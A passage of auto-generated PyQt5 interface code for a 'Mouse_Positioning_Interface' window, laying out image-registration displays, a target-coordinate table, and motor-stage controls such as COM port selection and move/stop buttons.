self.verticalLayout_2.setObjectName("verticalLayout_2")
self.groupBox_10 = QtWidgets.QGroupBox(self.frame_4)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_10.sizePolicy().hasHeightForWidth())
self.groupBox_10.setSizePolicy(sizePolicy)
self.groupBox_10.setMinimumSize(QtCore.QSize(100, 0))
self.groupBox_10.setMaximumSize(QtCore.QSize(400, 16777215))
font = QtGui.QFont()
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.groupBox_10.setFont(font)
self.groupBox_10.setAutoFillBackground(False)
self.groupBox_10.setObjectName("groupBox_10")
self.gridLayout_2 = QtWidgets.QGridLayout(self.groupBox_10)
self.gridLayout_2.setObjectName("gridLayout_2")
self.TableTxt_y = QtWidgets.QLineEdit(self.groupBox_10)
self.TableTxt_y.setEnabled(False)
self.TableTxt_y.setMinimumSize(QtCore.QSize(40, 0))
font = QtGui.QFont()
font.setPointSize(10)
self.TableTxt_y.setFont(font)
self.TableTxt_y.setObjectName("TableTxt_y")
self.gridLayout_2.addWidget(self.TableTxt_y, 1, 1, 1, 1)
self.label_13 = QtWidgets.QLabel(self.groupBox_10)
font = QtGui.QFont()
font.setPointSize(10)
self.label_13.setFont(font)
self.label_13.setObjectName("label_13")
self.gridLayout_2.addWidget(self.label_13, 0, 0, 1, 1)
self.label_57 = QtWidgets.QLabel(self.groupBox_10)
font = QtGui.QFont()
font.setPointSize(10)
self.label_57.setFont(font)
self.label_57.setObjectName("label_57")
self.gridLayout_2.addWidget(self.label_57, 0, 2, 1, 1)
self.label_14 = QtWidgets.QLabel(self.groupBox_10)
font = QtGui.QFont()
font.setPointSize(10)
self.label_14.setFont(font)
self.label_14.setObjectName("label_14")
self.gridLayout_2.addWidget(self.label_14, 1, 0, 1, 1)
self.TableTxt_x = QtWidgets.QLineEdit(self.groupBox_10)
self.TableTxt_x.setEnabled(False)
self.TableTxt_x.setMinimumSize(QtCore.QSize(40, 0))
font = QtGui.QFont()
font.setPointSize(10)
self.TableTxt_x.setFont(font)
self.TableTxt_x.setObjectName("TableTxt_x")
self.gridLayout_2.addWidget(self.TableTxt_x, 0, 1, 1, 1)
self.label_58 = QtWidgets.QLabel(self.groupBox_10)
font = QtGui.QFont()
font.setPointSize(10)
self.label_58.setFont(font)
self.label_58.setObjectName("label_58")
self.gridLayout_2.addWidget(self.label_58, 1, 2, 1, 1)
self.verticalLayout_2.addWidget(self.groupBox_10)
self.Group_Result = QtWidgets.QGroupBox(self.frame_4)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Group_Result.sizePolicy().hasHeightForWidth())
self.Group_Result.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.Group_Result.setFont(font)
self.Group_Result.setObjectName("Group_Result")
self.gridLayout_8 = QtWidgets.QGridLayout(self.Group_Result)
self.gridLayout_8.setObjectName("gridLayout_8")
self.TableTxt_yCorr = QtWidgets.QLineEdit(self.Group_Result)
self.TableTxt_yCorr.setEnabled(False)
self.TableTxt_yCorr.setMinimumSize(QtCore.QSize(40, 0))
font = QtGui.QFont()
font.setPointSize(10)
self.TableTxt_yCorr.setFont(font)
self.TableTxt_yCorr.setObjectName("TableTxt_yCorr")
self.gridLayout_8.addWidget(self.TableTxt_yCorr, 1, 1, 1, 1)
self.label_9 = QtWidgets.QLabel(self.Group_Result)
font = QtGui.QFont()
font.setPointSize(10)
self.label_9.setFont(font)
self.label_9.setObjectName("label_9")
self.gridLayout_8.addWidget(self.label_9, 0, 0, 1, 1)
self.TableTxt_xCorr = QtWidgets.QLineEdit(self.Group_Result)
self.TableTxt_xCorr.setEnabled(False)
self.TableTxt_xCorr.setMinimumSize(QtCore.QSize(40, 0))
font = QtGui.QFont()
font.setPointSize(10)
self.TableTxt_xCorr.setFont(font)
self.TableTxt_xCorr.setObjectName("TableTxt_xCorr")
self.gridLayout_8.addWidget(self.TableTxt_xCorr, 0, 1, 1, 1)
self.label_59 = QtWidgets.QLabel(self.Group_Result)
font = QtGui.QFont()
font.setPointSize(10)
self.label_59.setFont(font)
self.label_59.setObjectName("label_59")
self.gridLayout_8.addWidget(self.label_59, 0, 2, 1, 1)
self.label_60 = QtWidgets.QLabel(self.Group_Result)
font = QtGui.QFont()
font.setPointSize(10)
self.label_60.setFont(font)
self.label_60.setObjectName("label_60")
self.gridLayout_8.addWidget(self.label_60, 1, 2, 1, 1)
self.label_10 = QtWidgets.QLabel(self.Group_Result)
font = QtGui.QFont()
font.setPointSize(10)
self.label_10.setFont(font)
self.label_10.setObjectName("label_10")
self.gridLayout_8.addWidget(self.label_10, 1, 0, 1, 1)
self.verticalLayout_2.addWidget(self.Group_Result)
self.gridLayout_4.addLayout(self.verticalLayout_2, 0, 4, 3, 1)
spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.gridLayout_4.addItem(spacerItem2, 0, 5, 1, 1)
self.groupBox_22 = QtWidgets.QGroupBox(self.frame_4)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_22.sizePolicy().hasHeightForWidth())
self.groupBox_22.setSizePolicy(sizePolicy)
self.groupBox_22.setMinimumSize(QtCore.QSize(0, 0))
self.groupBox_22.setObjectName("groupBox_22")
self.Label_Trafo_Params = QtWidgets.QLabel(self.groupBox_22)
self.Label_Trafo_Params.setGeometry(QtCore.QRect(10, 42, 59, 16))
self.Label_Trafo_Params.setObjectName("Label_Trafo_Params")
self.label_15 = QtWidgets.QLabel(self.groupBox_22)
self.label_15.setGeometry(QtCore.QRect(10, 23, 98, 16))
self.label_15.setObjectName("label_15")
self.gridLayout_4.addWidget(self.groupBox_22, 1, 2, 2, 1)
self.groupBox_24 = QtWidgets.QGroupBox(self.frame_4)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_24.sizePolicy().hasHeightForWidth())
self.groupBox_24.setSizePolicy(sizePolicy)
self.groupBox_24.setMinimumSize(QtCore.QSize(0, 150))
self.groupBox_24.setObjectName("groupBox_24")
self.gridLayout_51 = QtWidgets.QGridLayout(self.groupBox_24)
self.gridLayout_51.setObjectName("gridLayout_51")
self.splitter_8 = QtWidgets.QSplitter(self.groupBox_24)
self.splitter_8.setOrientation(QtCore.Qt.Horizontal)
self.splitter_8.setObjectName("splitter_8")
self.splitter_7 = QtWidgets.QSplitter(self.splitter_8)
self.splitter_7.setOrientation(QtCore.Qt.Vertical)
self.splitter_7.setObjectName("splitter_7")
self.label_19 = QtWidgets.QLabel(self.splitter_7)
self.label_19.setObjectName("label_19")
self.label_20 = QtWidgets.QLabel(self.splitter_7)
self.label_20.setObjectName("label_20")
self.splitter_6 = QtWidgets.QSplitter(self.splitter_8)
self.splitter_6.setOrientation(QtCore.Qt.Horizontal)
self.splitter_6.setObjectName("splitter_6")
self.splitter_5 = QtWidgets.QSplitter(self.splitter_6)
self.splitter_5.setOrientation(QtCore.Qt.Vertical)
self.splitter_5.setObjectName("splitter_5")
self.Box_MotorOriginX = QtWidgets.QDoubleSpinBox(self.splitter_5)
self.Box_MotorOriginX.setEnabled(True)
self.Box_MotorOriginX.setDecimals(3)
self.Box_MotorOriginX.setMaximum(1000.0)
self.Box_MotorOriginX.setObjectName("Box_MotorOriginX")
self.Box_MotorOriginY = QtWidgets.QDoubleSpinBox(self.splitter_5)
self.Box_MotorOriginY.setDecimals(3)
self.Box_MotorOriginY.setMaximum(1000.0)
self.Box_MotorOriginY.setObjectName("Box_MotorOriginY")
self.Btn_setMotor_Origin = QtWidgets.QPushButton(self.splitter_6)
self.Btn_setMotor_Origin.setObjectName("Btn_setMotor_Origin")
self.gridLayout_51.addWidget(self.splitter_8, 1, 0, 1, 1)
self.Btn_getCurrentMotor = QtWidgets.QPushButton(self.groupBox_24)
self.Btn_getCurrentMotor.setObjectName("Btn_getCurrentMotor")
self.gridLayout_51.addWidget(self.Btn_getCurrentMotor, 0, 0, 1, 1)
self.Btn_Reg_calcTable = QtWidgets.QPushButton(self.groupBox_24)
self.Btn_Reg_calcTable.setObjectName("Btn_Reg_calcTable")
self.gridLayout_51.addWidget(self.Btn_Reg_calcTable, 2, 0, 1, 1)
spacerItem3 = QtWidgets.QSpacerItem(20, 55, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout_51.addItem(spacerItem3, 3, 0, 1, 1)
self.gridLayout_4.addWidget(self.groupBox_24, 0, 3, 3, 1)
self.groupBox_23 = QtWidgets.QGroupBox(self.frame_4)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_23.sizePolicy().hasHeightForWidth())
self.groupBox_23.setSizePolicy(sizePolicy)
self.groupBox_23.setMinimumSize(QtCore.QSize(0, 0))
self.groupBox_23.setMaximumSize(QtCore.QSize(1000000, 100000))
self.groupBox_23.setObjectName("groupBox_23")
self.gridLayout_12 = QtWidgets.QGridLayout(self.groupBox_23)
self.gridLayout_12.setObjectName("gridLayout_12")
self.table_TrgCoords = QtWidgets.QTableWidget(self.groupBox_23)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.table_TrgCoords.sizePolicy().hasHeightForWidth())
self.table_TrgCoords.setSizePolicy(sizePolicy)
self.table_TrgCoords.setMinimumSize(QtCore.QSize(0, 0))
self.table_TrgCoords.setMaximumSize(QtCore.QSize(200, 16777215))
self.table_TrgCoords.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.table_TrgCoords.setObjectName("table_TrgCoords")
self.table_TrgCoords.setColumnCount(2)
self.table_TrgCoords.setRowCount(2)
item = QtWidgets.QTableWidgetItem()
self.table_TrgCoords.setVerticalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.table_TrgCoords.setVerticalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.table_TrgCoords.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.table_TrgCoords.setHorizontalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.table_TrgCoords.setItem(0, 0, item)
item = QtWidgets.QTableWidgetItem()
self.table_TrgCoords.setItem(1, 0, item)
self.table_TrgCoords.horizontalHeader().setDefaultSectionSize(58)
self.table_TrgCoords.horizontalHeader().setMinimumSectionSize(40)
self.table_TrgCoords.verticalHeader().setDefaultSectionSize(30)
self.gridLayout_12.addWidget(self.table_TrgCoords, 0, 0, 1, 2)
self.Button_flip_layers = QtWidgets.QPushButton(self.groupBox_23)
self.Button_flip_layers.setMaximumSize(QtCore.QSize(16777215, 25))
self.Button_flip_layers.setObjectName("Button_flip_layers")
self.gridLayout_12.addWidget(self.Button_flip_layers, 1, 0, 1, 1)
self.Button_show_Atlas = QtWidgets.QPushButton(self.groupBox_23)
self.Button_show_Atlas.setMaximumSize(QtCore.QSize(16777215, 25))
self.Button_show_Atlas.setObjectName("Button_show_Atlas")
self.gridLayout_12.addWidget(self.Button_show_Atlas, 1, 1, 1, 1)
spacerItem4 = QtWidgets.QSpacerItem(17, 37, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)
self.gridLayout_12.addItem(spacerItem4, 2, 0, 1, 1)
self.gridLayout_4.addWidget(self.groupBox_23, 0, 1, 3, 1)
self.gridLayout_11.addWidget(self.frame_4, 1, 0, 1, 3)
self.groupBox_18 = QtWidgets.QGroupBox(self.tab)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.MinimumExpanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_18.sizePolicy().hasHeightForWidth())
self.groupBox_18.setSizePolicy(sizePolicy)
self.groupBox_18.setObjectName("groupBox_18")
self.verticalLayout = QtWidgets.QVBoxLayout(self.groupBox_18)
self.verticalLayout.setObjectName("verticalLayout")
self.Graybar_Moving = matplotlibWidget(self.groupBox_18)
self.Graybar_Moving.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Graybar_Moving.sizePolicy().hasHeightForWidth())
self.Graybar_Moving.setSizePolicy(sizePolicy)
self.Graybar_Moving.setMinimumSize(QtCore.QSize(0, 80))
self.Graybar_Moving.setMaximumSize(QtCore.QSize(1000000, 100))
self.Graybar_Moving.setObjectName("Graybar_Moving")
self.verticalLayout.addWidget(self.Graybar_Moving)
self.Display_Moving = matplotlibWidget(self.groupBox_18)
self.Display_Moving.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Display_Moving.sizePolicy().hasHeightForWidth())
self.Display_Moving.setSizePolicy(sizePolicy)
self.Display_Moving.setMinimumSize(QtCore.QSize(300, 100))
self.Display_Moving.setMaximumSize(QtCore.QSize(1000000, 1000000))
self.Display_Moving.setObjectName("Display_Moving")
self.verticalLayout.addWidget(self.Display_Moving)
self.Button_load_moving = QtWidgets.QPushButton(self.groupBox_18)
self.Button_load_moving.setMaximumSize(QtCore.QSize(16777215, 25))
self.Button_load_moving.setObjectName("Button_load_moving")
self.verticalLayout.addWidget(self.Button_load_moving)
self.Label_Moving = QtWidgets.QLabel(self.groupBox_18)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Label_Moving.sizePolicy().hasHeightForWidth())
self.Label_Moving.setSizePolicy(sizePolicy)
self.Label_Moving.setMinimumSize(QtCore.QSize(0, 20))
self.Label_Moving.setMaximumSize(QtCore.QSize(16777215, 40))
self.Label_Moving.setText("")
self.Label_Moving.setObjectName("Label_Moving")
self.verticalLayout.addWidget(self.Label_Moving)
self.gridLayout_11.addWidget(self.groupBox_18, 0, 0, 1, 1)
self.groupBox_19 = QtWidgets.QGroupBox(self.tab)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.MinimumExpanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_19.sizePolicy().hasHeightForWidth())
self.groupBox_19.setSizePolicy(sizePolicy)
self.groupBox_19.setObjectName("groupBox_19")
self.gridLayout_45 = QtWidgets.QGridLayout(self.groupBox_19)
self.gridLayout_45.setObjectName("gridLayout_45")
self.Display_Fixed = matplotlibWidget(self.groupBox_19)
self.Display_Fixed.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Display_Fixed.sizePolicy().hasHeightForWidth())
self.Display_Fixed.setSizePolicy(sizePolicy)
self.Display_Fixed.setMinimumSize(QtCore.QSize(300, 300))
self.Display_Fixed.setMaximumSize(QtCore.QSize(1000000, 1000000))
self.Display_Fixed.setObjectName("Display_Fixed")
self.gridLayout_45.addWidget(self.Display_Fixed, 1, 0, 1, 1)
self.Button_load_fixed = QtWidgets.QPushButton(self.groupBox_19)
self.Button_load_fixed.setMaximumSize(QtCore.QSize(16777215, 25))
self.Button_load_fixed.setObjectName("Button_load_fixed")
self.gridLayout_45.addWidget(self.Button_load_fixed, 2, 0, 1, 1)
self.Label_Fixed = QtWidgets.QLabel(self.groupBox_19)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Label_Fixed.sizePolicy().hasHeightForWidth())
self.Label_Fixed.setSizePolicy(sizePolicy)
self.Label_Fixed.setMinimumSize(QtCore.QSize(0, 0))
self.Label_Fixed.setMaximumSize(QtCore.QSize(16777215, 40))
self.Label_Fixed.setText("")
self.Label_Fixed.setObjectName("Label_Fixed")
self.gridLayout_45.addWidget(self.Label_Fixed, 3, 0, 1, 1)
self.Graybar_Fixed = matplotlibWidget(self.groupBox_19)
self.Graybar_Fixed.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Graybar_Fixed.sizePolicy().hasHeightForWidth())
self.Graybar_Fixed.setSizePolicy(sizePolicy)
self.Graybar_Fixed.setMinimumSize(QtCore.QSize(0, 80))
self.Graybar_Fixed.setMaximumSize(QtCore.QSize(1000000, 100))
self.Graybar_Fixed.setObjectName("Graybar_Fixed")
self.gridLayout_45.addWidget(self.Graybar_Fixed, 0, 0, 1, 1)
self.gridLayout_11.addWidget(self.groupBox_19, 0, 1, 1, 1)
self.Registration.addTab(self.tab, "")
self.TabMotor = QtWidgets.QWidget()
self.TabMotor.setObjectName("TabMotor")
self.gridLayout_42 = QtWidgets.QGridLayout(self.TabMotor)
self.gridLayout_42.setObjectName("gridLayout_42")
spacerItem5 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.gridLayout_42.addItem(spacerItem5, 0, 3, 1, 1)
self.groupBox_6 = QtWidgets.QGroupBox(self.TabMotor)
self.groupBox_6.setObjectName("groupBox_6")
self.gridLayout_7 = QtWidgets.QGridLayout(self.groupBox_6)
self.gridLayout_7.setObjectName("gridLayout_7")
self.BoxTableCOM = QtWidgets.QFrame(self.groupBox_6)
self.BoxTableCOM.setMinimumSize(QtCore.QSize(0, 20))
self.BoxTableCOM.setAutoFillBackground(False)
self.BoxTableCOM.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.BoxTableCOM.setFrameShadow(QtWidgets.QFrame.Sunken)
self.BoxTableCOM.setObjectName("BoxTableCOM")
self.gridLayout_39 = QtWidgets.QGridLayout(self.BoxTableCOM)
self.gridLayout_39.setObjectName("gridLayout_39")
self.LabelCOM = QtWidgets.QLabel(self.BoxTableCOM)
self.LabelCOM.setAlignment(QtCore.Qt.AlignCenter)
self.LabelCOM.setObjectName("LabelCOM")
self.gridLayout_39.addWidget(self.LabelCOM, 0, 0, 1, 1)
self.gridLayout_7.addWidget(self.BoxTableCOM, 7, 0, 1, 1)
self.BoxTableLimits = QtWidgets.QFrame(self.groupBox_6)
self.BoxTableLimits.setMinimumSize(QtCore.QSize(0, 20))
self.BoxTableLimits.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.BoxTableLimits.setFrameShadow(QtWidgets.QFrame.Sunken)
self.BoxTableLimits.setObjectName("BoxTableLimits")
self.gridLayout_41 = QtWidgets.QGridLayout(self.BoxTableLimits)
self.gridLayout_41.setObjectName("gridLayout_41")
self.LabelREF = QtWidgets.QLabel(self.BoxTableLimits)
self.LabelREF.setAlignment(QtCore.Qt.AlignCenter)
self.LabelREF.setObjectName("LabelREF")
self.gridLayout_41.addWidget(self.LabelREF, 0, 0, 1, 1)
self.gridLayout_7.addWidget(self.BoxTableLimits, 9, 0, 1, 1)
spacerItem6 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout_7.addItem(spacerItem6, 6, 0, 1, 1)
self.label_2 = QtWidgets.QLabel(self.groupBox_6)
self.label_2.setObjectName("label_2")
self.gridLayout_7.addWidget(self.label_2, 4, 0, 1, 1)
self.Label_COMPort = QtWidgets.QLabel(self.groupBox_6)
font = QtGui.QFont()
font.setPointSize(10)
self.Label_COMPort.setFont(font)
self.Label_COMPort.setObjectName("Label_COMPort")
self.gridLayout_7.addWidget(self.Label_COMPort, 0, 0, 1, 1)
self.QComboBox_ListOfPorts = QtWidgets.QComboBox(self.groupBox_6)
self.QComboBox_ListOfPorts.setEnabled(True)
self.QComboBox_ListOfPorts.setObjectName("QComboBox_ListOfPorts")
self.gridLayout_7.addWidget(self.QComboBox_ListOfPorts, 1, 0, 1, 1)
self.Button_MotorInit = QtWidgets.QPushButton(self.groupBox_6)
self.Button_MotorInit.setObjectName("Button_MotorInit")
self.gridLayout_7.addWidget(self.Button_MotorInit, 2, 0, 1, 1)
self.Button_MotorDisconnect = QtWidgets.QPushButton(self.groupBox_6)
self.Button_MotorDisconnect.setObjectName("Button_MotorDisconnect")
self.gridLayout_7.addWidget(self.Button_MotorDisconnect, 3, 0, 1, 1)
self.CBoxABSREL = QtWidgets.QComboBox(self.groupBox_6)
self.CBoxABSREL.setMinimumSize(QtCore.QSize(100, 0))
self.CBoxABSREL.setCurrentText("")
self.CBoxABSREL.setObjectName("CBoxABSREL")
self.gridLayout_7.addWidget(self.CBoxABSREL, 5, 0, 1, 1)
self.BoxTableInit = QtWidgets.QFrame(self.groupBox_6)
self.BoxTableInit.setMinimumSize(QtCore.QSize(0, 20))
self.BoxTableInit.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.BoxTableInit.setFrameShadow(QtWidgets.QFrame.Sunken)
self.BoxTableInit.setObjectName("BoxTableInit")
self.gridLayout_40 = QtWidgets.QGridLayout(self.BoxTableInit)
self.gridLayout_40.setObjectName("gridLayout_40")
self.LabelINIT = QtWidgets.QLabel(self.BoxTableInit)
self.LabelINIT.setAlignment(QtCore.Qt.AlignCenter)
self.LabelINIT.setObjectName("LabelINIT")
self.gridLayout_40.addWidget(self.LabelINIT, 0, 0, 1, 1)
self.gridLayout_7.addWidget(self.BoxTableInit, 10, 0, 1, 1)
self.gridLayout_42.addWidget(self.groupBox_6, 0, 0, 2, 1)
self.splitter_3 = QtWidgets.QSplitter(self.TabMotor)
self.splitter_3.setOrientation(QtCore.Qt.Vertical)
self.splitter_3.setObjectName("splitter_3")
self.groupBox_4 = QtWidgets.QGroupBox(self.splitter_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_4.sizePolicy().hasHeightForWidth())
self.groupBox_4.setSizePolicy(sizePolicy)
self.groupBox_4.setObjectName("groupBox_4")
self.gridLayout_25 = QtWidgets.QGridLayout(self.groupBox_4)
self.gridLayout_25.setObjectName("gridLayout_25")
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.label_4 = QtWidgets.QLabel(self.groupBox_4)
self.label_4.setObjectName("label_4")
self.horizontalLayout_4.addWidget(self.label_4)
self.TablePosX = QtWidgets.QLineEdit(self.groupBox_4)
self.TablePosX.setEnabled(False)
self.TablePosX.setObjectName("TablePosX")
self.horizontalLayout_4.addWidget(self.TablePosX)
self.label_66 = QtWidgets.QLabel(self.groupBox_4)
self.label_66.setObjectName("label_66")
self.horizontalLayout_4.addWidget(self.label_66)
self.gridLayout_25.addLayout(self.horizontalLayout_4, 0, 0, 1, 1)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.label_64 = QtWidgets.QLabel(self.groupBox_4)
self.label_64.setObjectName("label_64")
self.horizontalLayout_3.addWidget(self.label_64)
self.TablePosY = QtWidgets.QLineEdit(self.groupBox_4)
self.TablePosY.setEnabled(False)
self.TablePosY.setObjectName("TablePosY")
self.horizontalLayout_3.addWidget(self.TablePosY)
self.label_65 = QtWidgets.QLabel(self.groupBox_4)
self.label_65.setObjectName("label_65")
self.horizontalLayout_3.addWidget(self.label_65)
self.gridLayout_25.addLayout(self.horizontalLayout_3, 1, 0, 1, 1)
spacerItem7 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout_25.addItem(spacerItem7, 2, 0, 1, 1)
self.groupBox_13 = QtWidgets.QGroupBox(self.splitter_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_13.sizePolicy().hasHeightForWidth())
self.groupBox_13.setSizePolicy(sizePolicy)
self.groupBox_13.setMinimumSize(QtCore.QSize(0, 200))
self.groupBox_13.setObjectName("groupBox_13")
self.gridLayout_34 = QtWidgets.QGridLayout(self.groupBox_13)
self.gridLayout_34.setObjectName("gridLayout_34")
self.Button_MoveTable = QtWidgets.QPushButton(self.groupBox_13)
self.Button_MoveTable.setObjectName("Button_MoveTable")
self.gridLayout_34.addWidget(self.Button_MoveTable, 2, 0, 1, 1)
self.Button_StopTable = QtWidgets.QPushButton(self.groupBox_13)
self.Button_StopTable.setObjectName("Button_StopTable")
self.gridLayout_34.addWidget(self.Button_StopTable, 3, 0, 1, 1)
self.horizontalLayout_7 = QtWidgets.QHBoxLayout()
self.horizontalLayout_7.setObjectName("horizontalLayout_7")
self.label_69 = QtWidgets.QLabel(self.groupBox_13)
self.label_69.setObjectName("label_69")
self.horizontalLayout_7.addWidget(self.label_69)
self.SpinBoxTabley = QtWidgets.QDoubleSpinBox(self.groupBox_13)
self.SpinBoxTabley.setDecimals(3)
self.SpinBoxTabley.setMinimum(-70000.0)
self.SpinBoxTabley.setMaximum(70000.0)
self.SpinBoxTabley.setSingleStep(0.1)
self.SpinBoxTabley.setObjectName("SpinBoxTabley")
self.horizontalLayout_7.addWidget(self.SpinBoxTabley)
self.label_70 = QtWidgets.QLabel(self.groupBox_13)
self.label_70.setObjectName("label_70")
self.horizontalLayout_7.addWidget(self.label_70)
self.gridLayout_34.addLayout(self.horizontalLayout_7, 1, 0, 1, 1)
spacerItem8 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout_34.addItem(spacerItem8, 5, 0, 1, 1)
self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.label_67 = QtWidgets.QLabel(self.groupBox_13)
self.label_67.setObjectName("label_67")
self.horizontalLayout_6.addWidget(self.label_67)
self.SpinBoxTablex = QtWidgets.QDoubleSpinBox(self.groupBox_13)
self.SpinBoxTablex.setDecimals(3)
self.SpinBoxTablex.setMinimum(-70000.0)
self.SpinBoxTablex.setMaximum(70000.0)
self.SpinBoxTablex.setSingleStep(0.1)
self.SpinBoxTablex.setObjectName("SpinBoxTablex")
self.horizontalLayout_6.addWidget(self.SpinBoxTablex)
self.label_68 = QtWidgets.QLabel(self.groupBox_13)
self.label_68.setObjectName("label_68")
self.horizontalLayout_6.addWidget(self.label_68)
self.gridLayout_34.addLayout(self.horizontalLayout_6, 0, 0, 1, 1)
self.ButtonCopyCoordinates = QtWidgets.QPushButton(self.groupBox_13)
self.ButtonCopyCoordinates.setObjectName("ButtonCopyCoordinates")
self.gridLayout_34.addWidget(self.ButtonCopyCoordinates, 4, 0, 1, 1)
self.gridLayout_42.addWidget(self.splitter_3, 0, 1, 1, 2)
spacerItem9 = QtWidgets.QSpacerItem(108, 118, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout_42.addItem(spacerItem9, 1, 2, 1, 1)
self.Registration.addTab(self.TabMotor, "")
self.gridLayout_50.addWidget(self.Registration, 0, 0, 1, 1)
Mouse_Positioning_Interface.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(Mouse_Positioning_Interface)
self.statusbar.setObjectName("statusbar")
Mouse_Positioning_Interface.setStatusBar(self.statusbar)
self.menuBar = QtWidgets.QMenuBar(Mouse_Positioning_Interface)
self.menuBar.setGeometry(QtCore.QRect(0, 0, 1708, 21))
self.menuBar.setObjectName("menuBar")
self.menuActions = QtWidgets.QMenu(self.menuBar)
self.menuActions.setObjectName("menuActions")
self.menuOptions = QtWidgets.QMenu(self.menuBar)
self.menuOptions.setObjectName("menuOptions")
self.menuLog_Level = QtWidgets.QMenu(self.menuOptions)
self.menuLog_Level.setObjectName("menuLog_Level")
self.menuUtils = QtWidgets.QMenu(self.menuBar)
self.menuUtils.setObjectName("menuUtils")
